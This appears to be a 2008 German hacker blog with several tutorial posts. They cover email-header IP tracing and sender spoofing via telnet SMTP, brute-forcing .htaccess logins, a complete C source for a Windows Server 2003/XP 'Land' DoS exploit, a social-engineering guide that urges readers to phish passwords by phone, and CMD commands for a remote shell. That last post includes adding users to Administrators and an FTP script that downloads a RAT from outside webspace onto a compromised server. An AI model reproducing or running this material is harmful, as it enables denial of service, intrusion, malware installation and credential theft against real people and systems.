Received: from [194.97.50.131] (helo=mout0.freenet.de) by mx07.web.de with esmtp (WEB.DE 4.101 #87) id 1C3YFv-0005xy-00 for empfänger@web.de; Sat, 04 Sep 2004 12:58:51 +0200 Received: from [194.97.55.148] (helo=mx5.freenet.de) by mout0.freenet.de with asmtp (Exim 4.41) id 1C3Xmr-0005MR-GC for empfänger@web.de; Sat, 04 Sep 2004 12:28:49 +0200 Received: from www6.emo.freenet-rz.de ([194.97.107.209]) by mx5.freenet.de with esmtp (Exim 4.42 #2) id 1C3Xmr-0006LW-FJ for empfänger@web.de; Sat, 04 Sep 2004 12:28:49 +0200 Received: from www-data by www6.emo.freenet-rz.de with local (Exim 4.34 1 (Panther_1)) id 1C3Xmq-0008PV-Db for ; Sat, 04 Sep 2004 12:28:48 +0200 To: empfänger@web.de From: absender@freenet.de Subject: Freenet-Test-Header X-Priority: 3 X-Abuse: 505990867 / 212.204.11.178 MIME-Version: 1.0 Content-Type: text/html; charset=”iso-8859-1″ Content-Transfer-Encoding: quoted-printable Message-Id: Date: Sat, 04 Sep 2004 12:28:48 +0200 Sender: absender@freenet.de
Freenet-Header
————————————

Ok. Wer sich jetzt wirkich die Mühe gemacht hat das alles zu lesen und zu studieren (wenn nicht DANN TUT ES GEFÄLLIGST O_o)
dem wird immer eine Ähnlichkeit bei allen Header aufegallen sein.
Es gibt auf jeden Fall immer folgenden Zeilen:

–> From : Absender@was-weiß-ich.de
–> To : Empfänger@was-weiß-ich.de
–> Datum : Sat, 04 Sep 2004 12:58:51
–> Subject: Irgendein-Test-Header
–> Die Ip : Hää … wo denn ?? Da sind so viele !!

Noch ein Tipp: Den Absender bei unübersichtlichen E-Mails immer bei dem @-Zeichen suchen !!! Dann muss man nicht allen Ernstes denken das “mx5.freenet.de” ein potenzieller Absender ist ^^

2. Die IP des anderen aus dem Header lesen.

Tja .. wie viele Ip’s sind denn so in den verschiedenen Headers ??

Yahoo.com = 2
Freenet = 4
Web.de = 2
GMX = 2

Oha … da tanzt ja wer ganz schön aus der Reihe … aber das ist egal …
Erstmal zu den E-Mail-Headern mit nur 2 Ip’s …. welche könnten das sein …

1. –> Die Ip des Senders und die des Hauptrechners von McDonalds … Nein !
2. –> Die Ip des Senders und die Von Bill Gates (Weil der ja Computer erfunden hat) … Ähmm … Nein !! Ganz Falsch !!!
3. –> Die Ip von deinem Router und deine Ip … Was sollte denn dann diese Sektion in diesem Tut ??
4. –> Die Ip des Absenders und die vom Mail-Server … na endlich …

Wenn wir uns also die Header mal genauer ansehen wird klar das es immer eine Ip gibt die in ALLEN Header gleich ist “212.204.11.178″ .. solange ich mich nicht vertippt habe. Das ist die Ip des Senders (in meinem Fall die Ip meines Routers aber dazu nachher mehr). Und die anderen ?? Ja das sind die Ip’s der einzelnen Mail-Server in den bestimmten Fällen:

Yahoo.com = 216.155.196.148
Gmx = 213.165.64.20
Web.de = 172.20.0.176

Jeder der jetzt glaub “Boah !! Ich hab die Ip von nem Server !! Denk hack ich jetzt” … stell dich an die Wand und erschieß dich selber …

Aber was ist denn nun mit Freenet ??

1.Ip = 194.97.50.131
2.Ip = 194.97.55.148
3.Ip = 194.97.107.209

Findet ihr es nicht auch ein bisschen auffällig das die alle mit 194.97. anfangen ??
Genau die gehören nämlich alle Freenet. Aber das kann uns ja auch scheiß egal sein denn wir wollten doch die Ip vom Sender und die haben wir ja ….

Aber wie kann man das schaffen ohne die Ip des Servers zu wissen ?? Nur mit rumgerate und nachfragen ??

1. Wenn ihr viele Ip’s in einem Header entdeckt dann vergleicht sie … bestes Beispiel Freenet.de.
2. Bei den anderen dreien könnte euch vielleicht folgendes aufgefallen sein :

from 212.204.11.178 by freemailng0105.web.de with HTTP
from 212.204.11.178 by www48.gmx.net with HTTP
from [212.204.11.178] by web61305.mail.yahoo.com via HTTP

?? was fällt da nun wieder auf ?? Alle Ip’s sind gleich … Ich sag nur Wand … Alle E-Mails wurden über Dienste verschickt die man über de Browser (Internet Explorer, Mozilla, Opera, Avant) abgerufen hat. Könnte das was mit dem HTTP zu tun haben vielleicht ??

Tja, wer in seinem Header eine Stelle entdeckt in der steht “with HTTP” der muss einfach nur ein paar Zeichen zurück und hat was er sucht *gg*

Beispiel Freenet .. wie gesagt vergleicht die Ip Adressen oder seht euch einfach die letzte an … die wirds sein.

3. Kann man einen Header fälschen ??

Ja. Man kann einfach keinen Verschicken!
Aber das macht doch der Dienst automatisch ??
Dann nehmen wir einen anderen Dienst. Wir benutzten jetzt mal “Telnet”

dazu öffnen wir einfach die DOS-Eingabeaufforderung unter Windwos —->
geben ein Telnet web.server 25 (wobei wir web.server durch unseren smtp-Server ersetzten) —>
mail from eure@adresse.com (eure@adresse.com natürlich ersetzen durch bill@microsuck.com *gg*) —>
rcpt to: empfänger@der.mail.com (ersetzen) —->
“data” eingeben —>
Eure nachricht schreiben —>
In eine Leere Zeile einen “.” eingeben —>

und das wars !!!
Falls einer ein paar Gute Smtp-Server haben sollte die auch noch wirklich laufen so kann er mir die gerne schicken !! Ich werde diese dann beim nächsten Update in den Anhang packen und die Person gebührend erwähnen.

So jetzt haben wir den Header selber geschrieben !! Wo ??
Na mit “mail from” und “rcpt to:”. Ohne unsere Ip oder änliches …

Geposted in Informatives

Rund ums .htaccess

Jun06
2008 Kommentieren Geschrieben von Daniel

Einführung

Dieses Passwort-Abfrage-System wurde ursprünglich von Apache-Servern eingesetzt, und konnte sich mittlerweile auf allen Serversystemen etablieren. Er bietet einen recht guten Schutz, und wird deshalb oft auf gebührenpflichtigen Seiten mit pornographischem Inhalt benutzt. Eine Website, die HTACCESS einsetzt, ist daran zu erkennen, dass bei betreten des Mitgliedsbereichs ein Popup-Dialog erscheint (nicht durch ein JavaScript generiert).

Der Aufbau von .HTACCESS-Dateien

In dem zu schützenden Verzeichnis ist eine Datei mit dem Namen .htaccess enthalten, welches für die Verwaltung der Passwörter zuständig ist: Wo liegen die Passwörter? Wie muss das Verzeichnis geschützt werden?

Ein .htaccess-File sieht mit einem Texteditor betrachtet so aus:

AuthUserFile /usr/home/meindir/passwd
AuthName Members
AuthType Basic

require valid-user

Aus dieser Datei ist nun ersichtlich, dass die Passwörter in der Datei passwd gespeichert werden, welche sich in meinem Home-Directory befindet. Sicherheitshalber sollte das Passwort-File nicht in der Nähe der HTML-Dokumente liegen, da dadurch ein Zugriff via WWW verunmöglicht wird. Bei der AuthName-Zeile ist der Titel der Dialogbox ersichtlich: Der zu schützende Bereich wird den Namen Members tragen. Das interessante am HTACCESS-Schutz ist, dass durch das HTACCESS-File automatisch auch alle Unterverzeichnisse unterhalb des Verzeichnisses, in dem sich die HTACCESS-Datei befindet, mitgeschützt sind.

Der Aufbau einer Passwort-Datei

Wie sieht nun die Passwort-Datei selber aus? Im Folgenden eine mögliche Passwort-Datei:

Prometheus:jnjQcF1WWpn8w
Manson:EqiRz2/cDdTjw
Rieekan:hGaVqYhVIi9ek

Für jedes Mitglied enthält die Passwortdatei eine Zeile, die aus zwei Teilen besteht, die durch einen Doppelpunkt getrennt sind, wie man es von den passwd-Dateien von Unix-Systemen her kennt. Der erste Teil ist der Login-Name, der zweite Teil enthält das Passwort in verschlüsselter Form. Diese Verschlüsselung ist sehr sicher. Sie ist maschinenspezifisch, und durch eine Falltürfunktion generiert worden. Das heisst, dass selbst wenn man diese Passwortdatei in die Finger bekommen würde, könnte man aus den verschlüsselten Passwörtern nicht die wirklichen Passwörter zurückberechnen. Bei der Passworteingabe wird das Passwort durch die Unix-Systemfunktion “crypt” kodiert und mit dem in der Passwortdatei abgelegten verschlüsselten Passwort verglichen. Ist es gleich, so ist der Login ok.

Angriffsmöglichkeiten

HTACCESS-Abfragen sind meist nur mit einer Brute-Force-Attacke knackbar. Das beste Tool für solche Zwecke ist mit Sicherheit UnSecure, wobei WWWHack mir auch schon gute Dienste leisten konnte.

Geposted in Security Informations

Windows Server 2003 and XP SP2 Remote DoS Exploit

Jun06
2008 Kommentieren Geschrieben von Daniel

…Is gar nicht so schwer wie es aussieht… :>

Alles was wir machen müssen ist diese zeile #define _BSD_SOURCE über Include setzten.
Und fertig is unser Land Exploit, jetzt nur noch mit gcc exploit.c –o land compilieren.

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/*
Windows Server 2003 and XP SP2 remote DoS exploit
Tested under OpenBSD 3.6 at WinXP SP 2
Vuln by Dejan Levaja
(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy
All rights reserved.
*/

//checksum function by r0ach
u_short checksum (u_short *addr, int len)
{
u_short *w = addr;
int i = len;
int sum = 0;
u_short answer;
while (i > 0)
{
sum += *w++;
i-=2;
}
if (i == 1) sum += *(u_char *)w;
sum = (sum >> 16) + (sum & 0xffff);
sum = sum + (sum >> 16);
return (~sum);
}
int main(int argc, char ** argv)
{
struct in_addr src, dst;
struct sockaddr_in sin;
struct _pseudoheader {
struct in_addr source_addr;
struct in_addr destination_addr;
u_char zero;
u_char protocol;
u_short length;
} pseudoheader;
struct ip * iph;
struct tcphdr * tcph;
int mysock;
u_char * packet;
u_char * pseudopacket;
int on = 1;
if( argc != 3)
{
fprintf(stderr, “r57windos.c by __blf\n”);
fprintf(stderr, “RusH Security Team\n”);
fprintf(stderr, “Usage: %s \n”, argv[0]);
return EX_USAGE;
}
if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL)
{
perror(“malloc()\n”);
return EX_OSERR;
}
inet_aton(argv[1], &src);
inet_aton(argv[1], &dst);
iph = (struct ip *) packet;
iph->ip_v = IPVERSION;
iph->ip_hl = 5;
iph->ip_tos = 0;
iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
iph->ip_off = htons(IP_DF);
iph->ip_ttl = 255;
iph->ip_p = IPPROTO_TCP;
iph->ip_sum = 0;
iph->ip_src = src;
iph->ip_dst = dst;
tcph = (struct tcphdr *)(packet +sizeof(struct ip));
tcph->th_sport = htons(atoi(argv[2]));
tcph->th_dport = htons(atoi(argv[2]));
tcph->th_seq = ntohl(rand());
tcph->th_ack = rand();
tcph->th_off = 5;
tcph->th_flags = TH_SYN; // setting up TCP SYN flag here
tcph->th_win = htons(512);
tcph->th_sum = 0;
tcph->th_urp = 0;
pseudoheader.source_addr = src;
pseudoheader.destination_addr = dst;
pseudoheader.zero = 0;
pseudoheader.protocol = IPPROTO_TCP;
pseudoheader.length = htons(sizeof(struct tcphdr));
if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL)
{
perror(“malloc()\n”);
return EX_OSERR;
}
memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));
mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if(!mysock)
{
perror(“socket!\n”);
return EX_OSERR;
}
if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror(“setsockopt”);
shutdown(mysock, 2);
return EX_OSERR;
}
sin.sin_family = PF_INET;
sin.sin_addr = dst;
sin.sin_port = htons(80);
if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0,
(struct sockaddr *)&sin, sizeof(sin)) == -1)
{
perror(“sendto()\n”);
shutdown(mysock, 2);
return EX_OSERR;
}
printf(“Packet sent. Remote machine should be down.\n”);
shutdown(mysock, 2);
return EX_OK;
}

Geposted in Security Informations

Social Engineering – Risikofaktor Mensch

Jun06
2008 Kommentieren Geschrieben von Daniel

Versucht das ganze, was ihr jetzt lesen werdet ruhig auch mal umzusetzen. Ihr werdet erstaunt sein, wie viele Menschen euch ihre Passwörter einfach preisgeben werden. Kevin Mitnick zB. hat einen Großteil seiner ‘Einbrüche’ nur mit Hilfe von Social Engeneering verübt. Ihr solltet nur aufpassen, das ihr keine auffällige Kinderstimme habt (an alle 12 jährigen 1337-Kiddies).

Definition

Das Social Engineering (dt.: Soziale Manipulation) ist eine Spionageattacke, die sich auf sozialer Ebene abspielt. Ein Social Engineer versucht sein Opfer so zu manipulieren, dass es ihm die Informationen gibt, die er haben möchte. Dies kann schwere Folgen haben, da der Social Engineer meist auf geheime, sicherheitsrelevante Informationen aus ist und er sich das schwächste Glied eines Unternehmens aussucht – die Mitarbeiter. Durch die nicht technische Vorgehensweise werden dann ausgeklügelte technische Sicherheitsvorkehrungen mit einem Schlag wertlos. Solche Angriffe, auf nichts-ahnende Personen, werden nach dem Geschehen auch nur sehr selten bemerkt und deshalb ist es notwendig die Mitarbeiter zu schulen. Grundsätzlich wird dieses Thema in 3 verschiedene Bereiche gegliedert:
Das Computer Based Social Engineering, das Human Based Social Engineering und das Reverse Social Engineering.

Der Unterschied ist folgender:
Das Computer Based Social Engineering wird den meisten Leuten wohl im Internet begegnen. Lästige PopUps – wer kennt sie nicht – springen auf und geben vor, dass man bei irgendeiner Verlosung, bei einem Gewinnspiel oder sonstigem gewonnen hat. Lässt man sich davon beeindrucken, so führt der Weg z.B. zu einem Formular, in dem man seine persönlichen Daten eintragen soll und dann nur den kleinen Submit-Button betätigen muss, um den großen Gewinn geliefert zu bekommen. Das wird höchst wahrscheinlich bei keiner dieser PopUp Meldungen der Fall sein (Warum auch? Sie haben ja eine Seite betreten und (wahrscheinlich) nicht einmal an einem solchen Gewinnspiel teilgenommen.)

Das Human Based Social Engineering versucht eher Informationen auf direktem Wege zu erhalten. So durchwühlen Informationsbegehrte z.B. die Mülltonnen einer Firma (Sie glauben gar nicht wie viele Informationen ein Social Engineer dabei ergattert), geben sich bei Telefonaten als ein Mitarbeiter einer anderen Abteilung aus, suchen innerhalb von Häusern nach Informationen oder beobachten die Zielpersonen. Mit diesem Bereich setze ich mich hier hauptsächlich auseinander.

Bei dem Reverse Social Engineering agiert der Angreifer als “Retter in der Not”. Er
verursacht ein Problem und behauptet anschließend derjenige zu sein, der damit beauftragt wurde, dasselbe zu lösen. Er geht dabei so raffiniert vor, dass der/die Mitarbeiter/in ihm jede Information verschafft, die er benötigt. Vor allem reagieren die Betroffenen immer sehr hilfsbereit, da man ja möglichst immer zur Seite stehen möchte, wenn jemand ein schwieriges Problem hat und er die benötigten Informationen zur Lösung nicht besitzt. Hierfür muss der Angreifer ebenfalls (wie bei den anderen beiden Bereichen) erst einmal Informationen sammeln, um sich dann am Telefon als Autoritätsperson ausgeben zu können.


Methoden

Die meisten Leute gehen davon aus, sie könnten erkennen wenn sie jemand manipulieren oder ihnen etwas vortäuschen will. So werden sie irgendwann einmal (und das mit Sicherheit, wenn es nicht schon passiert ist) zu einem Opfer einer Spionageaktion, da der Social Engineer die Schwächen des Menschen auszunutzen versucht, indem er z.B. ihr Vertrauen gewinnt oder auch die kleinsten Informationsteilchen ergattert, die dem Einzelnen vielleicht gar nicht als wichtig erscheinen, aber bei Zusammenfügen zu einem vollständigen Puzzle mit hohem Informationsgrad werden können, das bei Anwendung durchaus schwere Folgen für Firmen oder Privatleute haben kann. Hier ein paar Methoden eines Social Engineers:

Vertrauensgewinnung des “Opfers”
Kommunikation im Fachjargon des Unternehmens
Vortäuschen eine Autoritätsperson zu sein
Vortäuschung von verschiedenen Stimmungslagen (hektisch, ärgerlich, freundlich)
Selbst ein Problem verursachen und als “Retter in der Not” agieren
Personen ohne Fachwissen zu sicherheitsgefährdenden Aktionen bewegen
Durchsuchung von Müllanlagen der Zielperson/des Zielunternehmens
usw.

Beispielszenarien

Szenario 1 – Das neue Sicherheitssystem

Ich nenne den Social Engineer hier einmal Michael und das “Opfer” Jennifer.

Jennifer: Microsystems GmbH Frankfurt[*], schönen guten Tag, Sie sprechen mit Jennifer Meier.
Michael: Guten Tag Frau Meier, hier spricht Michael Lenden aus München. Ich bin zuständig für die Umstellung der Serversysteme hier bei Microsystems in München.
Jennifer: Was kann ich für Sie tun?
Michael: Ich benötige wohl einmal ihre ID, die OneCard Nummer und ihr Passwort.
Jennifer: OneCard Nummer? Sowas besitze ich nicht! Was soll das sein?
Michael: Oh, haben Sie denn noch nichts von der Änderung gehört?
Jennifer: Nein, welche Änderung?
Michael: Wir haben hier vor ein paar Tagen eine Umstrukturierung vorgenommen, um die Sicherheit der Kundendaten zu erhöhen. Das System ist nun durch eine doppelte Authentifizierung von ID und OneCard Nummer sicherer vor Zugriff unbefugter Personen. Jeder Mitarbeiter sollte eine OneCard Nummer in einer Email zugesendet bekommen haben, um sich authentifizieren zu können. Die Person, die die OneCard Nummern verschickt hat, ist nur leider für eine längere Zeit krank geschrieben und ich wurde beauftragt die weiteren Umstellungen für ihn vorzunehmen, habe aber leider die Liste der Mitarbeiterdaten nicht hier. Deshalb muss ich nun jeden Mitarbeiter danach fragen.
Jennifer: Ich würde Ihnen ja gerne helfen, aber ich habe eine solche Nummer nicht bekommen.
Michael: Komisch, die eMail müsste spätestens heute angekommen sein. Schauen Sie vielleicht bitte nocheinmal eben in Ihrem Postfach nach?
Jennifer: Ok, einen Moment – ah ja, da ist etwas gekommen – moment. Wie war der Name Ihres kranken Mitarbeiters doch gleich?
Michael: Stefan Beckenheim.
Jennifer: Ja, ich habe eine eMail von ihm bekommen. Ah ja, da ist ja die Nummer. Ich diktiere: 1-3-645-234-954. Sonst noch etwas?
Michael: Dann bräuchte ich nur noch Ihre ID und das Passwort.
Jennifer: Ok, die ID ist “Jenn” und der Passwort “JennMei”.
Michael: Ok, vielen Dank, ich werde dann nun Ihren Account auf das neue System umstellen.
Jennifer: Alles klar, vielen Dank. Bestellen Sie Ihrem Mitarbeiter bitte gute Besserung.
Michael: Werde ich machen. Wiederhören!

* Anmerkung:
Die Verwendung von bestehenden Firmennamen ist nicht beabsichtigt. Sie sind ausgedacht und stehen in keinerlei Zusammenhang mit existierenden Firmen.

Szenario 2 – Die Hilfestellung in der Not

Stellen Sie sich einmal eine Buchhalterin vor. Diese arbeitet den ganzen Tag am Computer, besitzt aber meistens kein Fachwissen über diesen. Nun ruft ein angeblicher Systemverwalter bei dieser Dame an und gibt vor, es gäbe einige Probleme mit Rechnern anderer Mitarbeiter und er wolle nun prüfen, ob sich bei ihrem Rechner dieselben Probleme zeigen. Er gibt ihr ein paar Anweisungen, was sie tun soll. Nach einigen Aktionen gibt er ihr die Aufgabe ihr eigenes Passwort zu ändern. Dieses solle sie tun, da man ein Update aufgesetzt hat, was das ermöglicht. Dazu solle sie ihm ihr altes allerdings auf keinen Fall laut nennen. Das neue Passwort soll nun “test123″ heißen. Sie ändert es und loggt sich aus. Nach einigen Minuten soll sie sich dann wieder einloggen. Er sagt zu ihr, dass es keine Probleme mit ihrem Computer gäbe und sie nun beruhigt ihr Passwort wieder ändern und mit ihrer Arbeit fortfahren könne. Sie ist sehr erleichtert, bedankt sich und legt auf.

Analyse

Szenario 1

Was ist hier passiert? Der Social Engineer hat sich als ein Mitarbeiter einer Abteilung in einer anderen Stadt, jedoch des gleichen Unternehmens, ausgegeben. Er hat die “Mitarbeiterin” mit einer angeblichen Änderung im System konfrontiert. Da es sich hierbei, wie so oft, um eine sicherheitsrelevante Änderung gehandelt und er ihr dieses “neue System” geläufig gemacht hat, wurde schon die erste Vorstufe zum Vertrauen errichtet. Dann erzählte er ihr von dem kranken Mitarbeiter, für den er seine Aufgaben nun erledigen sollte. Er gab vor, keine Informationen über die Daten (“OneCard Nummer”, ID, Passwort) der Mitarbeiter vorliegen zu haben und nun die Hilfe der Mitarbeiter selbst benötige. Hier sieht man – zwar nicht so ausgeprägt wie es sein könnte -, die Methoden des Social Engineers, nämlich die Vertrauensgewinnung (durch Status(Rang), benötigen von Hilfe, u.a.), Hilfestellung (hier: in Form der Aufklärung über das neue System) und die Überzeugung der Tatsache dadurch, dass die Mitarbeiterin eine persönliche Email erhalten hat. Diese Email war natürlich nur ein Fake und der erkrankte Mitarbeiter existiert auch nicht, aber beides verschaffte dem Angreifer Vertrauen vom “Opfer”. Die “OneCard Nummer” war auch eine erdachte Geschichte und sollte nur zur Ablenkung und Vertrauensgewinnung für die wirklich wichtigen Informationen sein, nämlich der ID und des Passworts, mit denen der Angreifer nun Zugriff auf das System hat und sich vielleicht sogar durch Schwachstellen eine (noch) höhere Authentität erringen kann.

Szenario 2

Der Social Engineer agiert hierbei als Retter vor/in der Not. Er gibt der Dame einige Anweisungen, um festzustellen, ob ihr Rechner dieselben Symptome aufzeigt oder nicht. Dazu muss sie ihr Passwort ändern. Er sagt allerdings zu ihr, dass sie ihr altes Passwort auf keinen Fall vorlesen solle. Damit erhält der Angreifer wiedereinmal Vertrauen und Gläubigkeit des “Opfers”. Sie schöpft also keinen Verdacht von irgendeinem Spionageangriff. In der Zwischenzeit aber, als die Dame sich vom System abgemeldet hat, hat der Social Engineer genügend Zeit, um sich selbst anzumelden (das Passwort ist ja nun “test123″) und ein Trojanisches Pferd zu installieren. Nach einigen Minuten loggt die Dame sich dann wieder ein und ist froh, als ihr der angebliche Systemverwalter ihr mitteilt, dass ihr System nicht von den Problemen betroffen ist und sie nun wieder mit ihrer Arbeit fortfahren könnte. Der Angreifer hat durch dieses von ihm entworfene Programm vollen Zugriff auf die Ressourcen der Frau. Er könnte nun alle möglichen (, sensiblen!?) Daten einsehen und so mehr über die Abläufe in der Firma lernen, um so vielleicht weitere Social Engineering Attacken auf diese Firma auszuüben!

Schutzmaßnahmen

Da Angriffe eines Social Engineers auch (noch) schwerere Folgen haben können als in den obigen Beispielen gezeigt, ist es wichtig, die Mitarbeiter einer Firma über solcherlei Befragungen aufzuklären, damit sie davor geschützt werden können. Außerdem sollten Sicherheitsrichtlinien eingeführt werden, die z.B. verbieten, einer Person, die sich als Mitarbeiter ausgibt, Daten mitzuteilen, ohne die Identität und die Befugnis der Person zu überprüfen. Das Hauptziel ist fast immer ein Passwort. Deshalb sollten die Mitarbeiter darin geschult werden, kein Vertrauen aufzubauen, alles in Frage zu stellen und niemals Passwörter oder Informationen über Mitarbeiter weiterzugeben. Falls dieses Weitergabe wirklich nötig ist, um z.B. eine reale Umstellung der Systeme durchzuführen, so sollten diese Daten am besten gar nicht erst telefonisch, sondern nur mit direktem Kontakt oder über firmeninterne Medien übergeben werden, die nicht in Verbindung mit außerfirmlichen Medien wie z.B. dem Internet zusammenhängen.

Wichtige Daten sollten nur an einen kleinen Personenkreis weitergegeben werden, der diese wirklich benötigt und der darin geschult ist, damit vorsichtig und achtsam umzugehen. Daten, die einem selbst vielleicht als unwichtig erscheinen, sollten trotzdem ohne Anfrage nach dem Verwendungszweck und Identitätsprüfung der Person auf der anderen Seite auf keinen Fall weitergegeben werden. Auch sollte jeder in der Lage sein, beurteilen zu können, ob diese Informationen in Verbindung mit anderen zu einem Sicherheitsrisiko für die Firma werden können und ob “der Gegenüber” für das Besitzen dieser Informationen wirklich befugt ist. Die beste Vorsorge ist aber, den Mitarbeitern keinen Zugang zu diesen Informationen zu geben, sondern nur einer Person, die sehr gut damit umgehen kann und die Methoden eines Social Engineers erkennt und ins Leere laufen lässt. Das Entsorgen von Papier sollte erst nachgründlichem Schreddern geschehen.

Andere Vorsichtsmaßnahmen sollten auch getroffen werden, die aber mehr zur Sicherung der EDV-System gehören. So sollten Passwörter in regelmäßigen Abständen von 2-4 Wochen geändert werden und aus Groß-, Kleinbuchstaben, Sonderzeichen, Zahlen und mindestens 8 Stellen bestehen. Die Systeme sollten auch einen Viren- bzw. Trojanerscanner beinhalten, der in kurzen Abständen von bis zu 3 Tagen aktualisiert werden. Sicherheitsrelevante Daten sollten erschlüsselt werden und nur innerhalb des Firmennetzwerkes verfügbar sein. Damit sollte der Schutz gegen die meisten Angriffe eines Social Engineers gesichert sein.
Weitere Sicherheitsmaßnahmen innerhalb der Gebäudearchitektur sind z.B. die Installierung von Kameras und Retinascannern (Stichwort: Biometrie). Ansonsten sollte man eventuell eine Karte einführen, die jeder Mitarbeiter erhält und womit sich jeder Mitarbeiter beim Beginn und Ende eines Arbeitstages ein- und auschecken sollte. Gäste sollten eine provisorische Karte erhalten und sich in einer Liste eintragen.

All diese Sicherheitsmaßnahmen bringen aber keinen Nutzen, wenn ein Mitarbeiter nicht versteht, warum sie eingeführt werden und was damit überhaupt verhindert wird. Deshalb sollten spezielle Trainingsseminare durchgeführt werden, wo sie dieses erlernen und anhand von Beispielen verstehen. Diese Seminare sollten nicht einmalig durchgeführt werden; in regelmäßigen Abständen sollten Ihre Mitarbeiter erinnert werden und an diesen Seminaren teilnehmen.

Literatur

Die Kunst der Täuschung (ISBN: 3-8266-0999-9, Verlag: mitp)
Google: Social Engineering

Geposted in Security Informations

Konsolenbefehle (CMD und Bash)

Jun06
2008 Kommentieren Geschrieben von Daniel

Konsolenbefehle (CMD und Bash)

Wir haben jetzt schon einige Wege kennengelernt, eine Remote-Shell (Konsole) auf einem System zu bekommen. Doch was nützt uns das, wenn wir keine tollen Befehle kenn, mit denen wir die Konsole füttern können? Unter Windows ist die Konsole die Eingabeaufforderung oder auch CMD (von command.com) genannt. Unter Linux gibt es verschiedene Konsolen, doch die am meisten genutzte ist wohl die Bash (Burn Again Shell). Auch wenn euch die Shells zu Anfang recht kompliziert vorkommen, wenn man sich mit ihnen angefreundet hat merkt man, dass sie einem relativ viel Arbeit ersparen und vor allen sehr Mächtig sind. Ausserdem sind sie für das Benutzen von Exploit unerlässlich. Also fangen wir mal an…

CMD

Wie bereits geschrieben auch Eingabeaufforderung genannt. Unter Windows erreicht ihr sie indem ihr auf Start -> Ausführen -> cmd geht. Die Klammern < > die ich verwende, gehören nicht zum Befehlssyntax, sondern sollen euch nur sagen, dass ihr hier eigene Parameter angeben müsst. Also dann gehen wir mal an die Basics. Wenn ihr mehr zu einem Befehl wissen wollt gibt als Parameter einfach /? ein und ihr bekommt eine ausführliche Hilfe. Groß- und Kleinschreibung ist bei Windows egal.

- öffnet eine Datei
cd – Wechseln in ein Verzeichnis (Change Directory)
cd – Wechselt in das Wurzelverzeichnis (Root-Directory)
cd.. – Wechselt ein Verzeichnis nach oben im Verzeichnisbaum
dir – Listet den Inhalt des Ordners auf in dem ihr euch gerade befindet
dir *.exe – Listet alle Dateien mit der Endung .exe auf (im aktuellen Verzeichnis)
: – Wechselt auf eine andere Festplatte
del – Löscht eine Datei
del *.* – Löscht alle Dateien im aktuellen Verzeichnis
move – Verschieben von Quelle nach Ziel
copy – Kopiert Datei von Quelle nach Ziel
format – *hrrrr* =D
mkdir – Erstellt ein Verzeichnis
rename – Datei1 in Datei2 umbenennen
net user – Gibt uns eine Liste alle Benutzer
net user – Gibt Informationen über einen bestimmten Benutzer aus
net localgroup – Listet alle lokalen Benutzergruppen auf
net localgroup – Informationen und Mitglieder einer bestimmten Gruppe
net services – Gibt uns eine Liste alle Dienste sowie deren Status an
net start – Startet einen Dienst
net stop – Stoppt einen Dienst
net send – Sendet eine Nachricht an einen PC
net user * /ADD – Fügt einen neuen Benutzer hinzu (Gruppe: Benutzer)
net localgroup /ADD – Fügt einen Benutzer einer Gruppe hinzu – Wie wäre es mit Administratoren =D
echo – Der Text nach echo wir ausgegeben
echo %% – Gibt den Inhalt einer Umgebungsvariable aus
ftp – Startet den FTP-Client
telnet – Startet den Telnet-Client
telnet – Zu einem Rechner auf einem bestimmten Port verbinden
ping – Ping eine IP
set – Zeigt alle Umgebungsvariablen an
title – Verpasst unserer Konsole einen neuen Titel
color – Farbe gefällig =D
type – Zeigt den Inhalt einer Datei
find “” /i – Durchsucht eine Datei nach einem String und ignoriert Groß- und Kleinschriebung
ver – Zeigt uns die aktuelle Windows-Version an
rem – Macht NIX =D Mit rem kommentiert man in Batch seinen Code =P
cls – Löscht den Inhalt der Konsole (falls das FBI gerade kommt =D)

Umleitungsoperatoren

dir /s | find “.bmp” /i
dir /s listet den kompletten Verzeichnisbaum inc. Unterverzeichnisse und Dateien auf (also den gesammten Festplatteninhalt). Das Pipe-Symbol | leitet diese Ausgabe jetzt nicht auf den Bildschrim sondern zum Befehl find “.bmp” /i weiter, wo nach dem String .bmp gesucht wird. So bekommen wir alle .bmps die sich auf der Festplatte angezeigt.

echo mo > new.txt
echo moo würde eigentlich den Text moo auf dem Bildschirm ausgeben, doch dieser wir durch den Umleitungsoperator > (ein Krokodil, das den Text auffrisst :P ) in die Datei new.txt geschrieben. Existiert die Datei nicht, so wird diese erstellt. Existiert die Datei bereits, so wird sie überschrieben.

echo r00t >> new.txt
Der Effekt ist der Gleiche wie bei nur einem Umleitungsoperator, doch wir die Datei nicht überschrieben, falls sie bereits vorhanden ist, sondern wird unsere Ausgabe unten angefügt.

Es gibt noch dem < Umleitungsoperator, aber den hab ich noch nie gebraucht.

FTP-Script

Jetzt stellt euch aber mal vor ihr habt eine Remote-Shell auf einem Server und wollt eine Datei hochladen (zB. ein RAT). Was machen wir dann? Zuerst holen wir uns etwas Webspace (zB. www.tripod.de) wo wir unsere Datei(en) hochladen, dann schreiben wir uns ein kleines Script und füttern damit den FTP-Client.

echo open ftp.tripod.de > scr
echo user >> scra
echo
>> scr
echo type binary >> scr
echo get >> scr
echo quit >> scr
ftp –s:scr –v –n

Jetzt nur noch die Datei ausführen und schon sind wir am Ziel.

Konsolen-Styling

Wenn wir jetzt schon zu Tastatur-Cowboys geworden sind, dann brauchen wir auch eine kewle Shell mit der wir und durch die ganze Welt hacken. Und mit unserem jetzigen Wissen ist das ganze auch kein Problem mehr =P
Macht einen Rechtsklick auf euren Desktop und geht auf Neu -> Verknüpfung. Jetzt geben wir als Datei folgenden ellenlangen String an…

